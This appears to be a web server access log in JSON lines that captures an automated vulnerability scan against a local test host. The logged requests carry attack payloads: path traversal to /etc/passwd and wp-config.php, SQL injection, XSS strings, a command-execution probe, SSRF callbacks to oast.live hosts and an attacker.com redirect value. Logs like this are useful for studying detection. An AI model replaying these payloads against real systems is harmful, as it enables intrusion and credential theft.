+{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"cmd=id&opts=&timeout=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/29KD1znuEjFldMTTK488vHo3wxa.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms5.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://ca28fg0smpvbd3qg07h0f8scmsnx4k8tr.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=stream HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms6.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://ca28fg0smpvbd3qg07h0yoiy1sad3m9eq.oast.live&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"Password=29KD1yfoobsVod95H3nTOGImMu6&ConfirmPassword=29KD1yfoobsVod95H3nTOGImMu6&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apt/v1/context HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms7.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-post.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 